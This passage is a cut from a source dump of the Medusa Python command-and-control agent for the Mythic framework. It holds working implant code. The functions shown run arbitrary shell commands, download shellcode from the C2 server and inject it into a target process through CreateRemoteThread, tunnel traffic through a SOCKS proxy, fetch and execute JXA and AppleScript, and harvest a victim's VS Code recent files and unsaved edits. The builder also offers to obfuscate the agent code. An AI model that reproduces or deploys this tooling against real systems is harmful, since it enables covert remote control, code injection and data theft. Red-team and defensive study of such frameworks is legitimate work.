initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": base64.b64encode(content),\n                            \"task_id\": task_id                        \n                        }\n                    ]\n                }\n                response = self.postMessageAndRetrieveResponse(data)\n        return json.dumps({ \"file_id\": initial_response[\"responses\"][0][\"file_id\"] })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/shell.py",
    "content": "    def shell(self, task_id, command):\n        import subprocess\n        process = subprocess.Popen(command, stdout=subprocess.PIPE, \n            stderr=subprocess.PIPE, cwd=self.current_directory, shell=True)\n        stdout, stderr = process.communicate()\n        out = stderr if stderr else stdout\n        return out.decode(\"utf-8\", \"replace\")\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/shinject.py",
    "content": "    def shinject(self, task_id, shellcode, process_id):\n        from ctypes import windll,c_int,byref,c_ulong,c_void_p\n        total_chunks = 1\n        chunk_num = 0\n        sc = b\"\"\n        while (chunk_num < total_chunks):\n            data = { \n                \"action\": \"post_response\", \"responses\": [{\n                    \"upload\": { \"chunk_size\": 51200, \"file_id\": shellcode, \"chunk_num\": chunk_num+1 },\n                    \"task_id\": task_id\n                }] \n            }\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            sc+=base64.b64decode(chunk[\"chunk_data\"])\n\n        PAGE_EXECUTE_READWRITE = 0x00000040\n        PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )\n        VIRTUAL_MEM  = ( 0x1000 | 0x2000 )\n\n        kernel32 = windll.kernel32\n        kernel32.VirtualAllocEx.restype = c_void_p\n        code_size = len(sc)\n        h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(process_id))\n\n        if not h_process:\n            return \"[!] Error: Couldn't acquire a handle to PID {}\".format(process_id)\n        arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)\n        kernel32.WriteProcessMemory(h_process, c_void_p(arg_address), sc, code_size, 0)\n        thread_id = c_ulong(0)\n        if not kernel32.CreateRemoteThread(h_process, None, 0, c_void_p(arg_address), None, 0, byref(thread_id)):\n            return \"[!] Failed to create thread.\"\n        return \"[*] Remote thread created.\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/sleep.py",
    "content": "    def sleep(self, task_id, seconds, jitter=-1):\n        self.agent_config[\"Sleep\"] = int(seconds)\n        if jitter != -1:\n            self.agent_config[\"Jitter\"] = int(jitter)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/socks.py2",
    "content": "    def socks(self, task_id, action, port):\n        import socket, select\n        from threading import Thread, active_count\n        from struct import pack, unpack\n        from Queue import Queue \n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE)\n                except PermissionError as err: return 0\n            try:\n                sock.connect((str(dst_addr), int(dst_port)))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = bytearray(message[:BUFSIZE])\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = 
socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        
data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] 
SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\\n\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if active_count() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"A2M:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"M2A:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n                
self.socks_open = {}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/socks.py3",
    "content": "    def socks(self, task_id, action, port):\n        import socket, select, queue\n        from threading import Thread, active_count\n        from struct import pack, unpack\n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data).decode(), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode())\n                except PermissionError as err: return 0\n            try:\n                sock.connect((dst_addr, dst_port))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = message[:BUFSIZE]\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                
dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        
if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return                \n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] 
SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\\n\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if active_count() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = queue.Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"a2m:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"m2a:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n           
     self.socks_open = {}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/spawn_jxa.py",
    "content": "    def spawn_jxa(self, task_id, file, language):\n        import os\n        import subprocess\n        \n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: \n            args = []\n            if language == \"JavaScript\":\n                args = [\"osascript\", \"-l\", \"JavaScript\", \"-\"]\n            elif language == \"AppleScript\":\n                args = [\"osascript\", \"-\"]\n\n            osapipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, \n                stderr=subprocess.PIPE)\n\n            stdout, stderr = osapipe.communicate(cmd_code.encode())\n            out = stderr if stderr else stdout\n            return str(out)\n        else: return \"Failed to load script\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/unload.py",
    "content": "    def unload(self, task_id, command):\n        try: getattr(medusa, command)\n        except: return \"{} not currently loaded.\".format(command)\n        delattr(medusa, command)\n        cmd_list = [{\"action\": \"remove\", \"cmd\": command}]\n        responses = [{ \"task_id\": task_id, \"user_output\": \"Unloaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/unload_module.py",
    "content": "    def unload_module(self, task_id, module_name):\n        if module_name in self._meta_cache:\n            finder = self._meta_cache.pop(module_name)\n            sys.meta_path.remove(finder)\n            self.moduleRepo.pop(module_name)\n            return \"{} module unloaded\".format(module_name)\n        else: return \"{} not found in loaded modules\".format(module_name)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/upload.py",
    "content": "    def upload(self, task_id, file, remote_path):\n        total_chunks = 1\n        chunk_num = 1\n\n        file_path = remote_path if os.path.isabs(remote_path) \\\n            else os.path.join(self.current_directory, remote_path)\n\n        with open(file_path, \"wb\") as f:\n            while chunk_num < total_chunks + 1:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                data = { \n                    \"action\": \"post_response\",\n                    \"responses\": [\n                        {\n                            \"upload\": {\n                                \"chunk_size\": CHUNK_SIZE,\n                                \"file_id\": file, \n                                \"chunk_num\": chunk_num,\n                                \"full_path\": file_path\n                            },\n                            \"task_id\": task_id\n                        }\n                    ] \n                }\n                response = self.postMessageAndRetrieveResponse(data)\n                chunk = response[\"responses\"][0]\n                chunk_num+=1\n                total_chunks = chunk[\"total_chunks\"]\n                f.write(base64.b64decode(chunk[\"chunk_data\"]))\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_list_recent.py",
    "content": "    def vscode_list_recent(self, task_id, db=\"\"):\n        import os, sqlite3, json\n        \n        path = db if db else \"/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb\".format(os.environ[\"USER\"])\n        recent_files = []\n\n        if not os.path.exists(path):\n            return \"VSCode State database path does not exist!\"\n\n        with sqlite3.connect(path) as con:\n            for row in con.execute('SELECT * FROM \"ItemTable\" WHERE KEY = \"history.recentlyOpenedPathsList\"'):\n                data = json.loads(row[1])\n                for entry in data[\"entries\"]:\n                    recent_file = {}\n                    if \"folderUri\" in entry:\n                        recent_file[\"path\"] = entry[\"folderUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"folder\"\n                    elif \"fileUri\" in entry:\n                        recent_file[\"path\"] = entry[\"fileUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"file\"\n                    recent_files.append(recent_file)\n        return json.dumps({ \"recents\": recent_files })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_open_edits.py",
    "content": "    def vscode_open_edits(self, task_id, backups_path=\"\"):\n        import os, json\n        import time\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.exists(path):\n            return \"VSCode backups folder does not exist!\"\n\n        open_edits = []\n        for root, dirs, files in os.walk(path):\n            for file in files:\n                if file != \".DS_Store\" and file != \"workspaces.json\":\n                    open_edit = {}\n                    path = os.path.join(root, file)\n                    with open(path, \"r\") as f:\n                        file_content = f.readlines()\n                        json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip())\n                        if os.path.basename(root) == \"untitled\":\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").rstrip()\n                            open_edit[\"size\"] = \"\"\n                            open_edit[\"mtime\"] = \"\"\n                            open_edit[\"ctime\"] = \"\"\n                            open_edit[\"type\"] = \"New\"\n                        else:\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"file://\",\"\").rstrip()\n                            open_edit[\"size\"] = f\"{json_data['size']} B\"\n                            open_edit[\"mtime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                            open_edit[\"ctime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"ctime\"]/1000))\n                            open_edit[\"type\"] = \"Edit\"\n                    open_edits.append(open_edit)\n        return 
json.dumps({ \"edits\" : open_edits })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_watch_edits.py",
    "content": "    def vscode_watch_edits(self, task_id, backups_path=\"\", seconds=1):\n        import hashlib, time, os, json\n\n        known_files = {}\n\n        def getOriginalFileDetails(path):\n            with open(path, \"r\") as f:\n                file_content = f.readlines()\n                json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip()) \n                return (\n                    file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").replace(\"file://\",\"\").rstrip(),\n                    json_data[\"size\"],\n                    time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                )\n\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue \n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New File: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) 
- Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] File Updated: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    \n                    known_files[full_file_path] = hash\n            \n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in 
list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n            \n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} Deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.isdir(path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(path, os.R_OK):\n            return \"[!] Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(path, False) \n            while(True):\n                if not os.path.exists(path):\n                    return  \"[!] Root directory has been deleted.\"\n                diffFolder(path)\n                time.sleep(seconds)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/watch_dir.py",
    "content": "    def watch_dir(self, task_id, path, seconds):\n        import hashlib\n        known_files = {}\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue\n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] New File: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] File Updated: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: 
self.sendTaskOutputUpdate(task_id, \"\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    known_files[full_file_path] = hash\n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] {} deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n    \n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n\n        if not os.path.isdir(file_path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(file_path, os.R_OK):\n            return \"[!] 
Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(file_path, False) \n            while(True):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n                if not os.path.exists(file_path):\n                    return \"[!] Root directory has been deleted.\"\n                diffFolder(file_path)\n                time.sleep(seconds)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/__init__.py",
    "content": "import glob\r\nimport os.path\r\nfrom pathlib import Path\r\nfrom importlib import import_module, invalidate_caches\r\nimport sys\r\n# Get file paths of all modules.\r\n\r\ncurrentPath = Path(__file__)\r\nsearchPath = currentPath.parent / \"agent_functions\" / \"*.py\"\r\nmodules = glob.glob(f\"{searchPath}\")\r\ninvalidate_caches()\r\nfor x in modules:\r\n    if not x.endswith(\"__init__.py\") and x[-3:] == \".py\":\r\n        module = import_module(f\"{__name__}.agent_functions.\" + Path(x).stem)\r\n        for el in dir(module):\r\n            if \"__\" not in el:\r\n                globals()[el] = getattr(module, el)\r\n\r\n\r\nsys.path.append(os.path.abspath(currentPath.name))"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/__init__.py",
    "content": ""
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/builder.py",
    "content": "from mythic_container.PayloadBuilder import *\nfrom mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\nimport asyncio, pathlib, os, tempfile, base64, hashlib, json, re\n\nfrom itertools import cycle\n\nclass Medusa(PayloadType):\n\n    name = \"medusa\"\n    file_extension = \"py\"\n    author = \"@ajpc500\"\n    supported_os = [\n        SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS\n    ]\n    wrapper = False\n    wrapped_payloads = [\"pickle_wrapper\"]\n    mythic_encrypts = True\n    note = \"This payload uses Python to create a simple agent\"\n    supports_dynamic_loading = True\n\n    c2_profiles = [\"http\", \"azure_blob\"]\n\n    build_parameters = [\n        BuildParameter(\n            name=\"output\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Choose output format\",\n            choices=[\"py\", \"base64\"],\n            default_value=\"py\"\n        ),\n        BuildParameter(\n            name=\"python_version\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Choose Python version\",\n            choices=[\"Python 3.8\", \"Python 2.7\"],\n            default_value=\"Python 3.8\"\n        ),\n        BuildParameter(\n            name=\"use_non_default_cryptography_lib\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Use non-default 'cryptography' Python library for comms (if not, manual crypto will be used)\",\n            choices=[\"No\", \"Yes\"],\n            default_value=\"No\"\n        ),\n        BuildParameter(\n            name=\"obfuscate_script\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"XOR and Base64-encode agent code\",\n            choices=[\"Yes\", \"No\"],\n            default_value=\"Yes\"\n        ),\n        BuildParameter(\n            name=\"https_check\",\n            
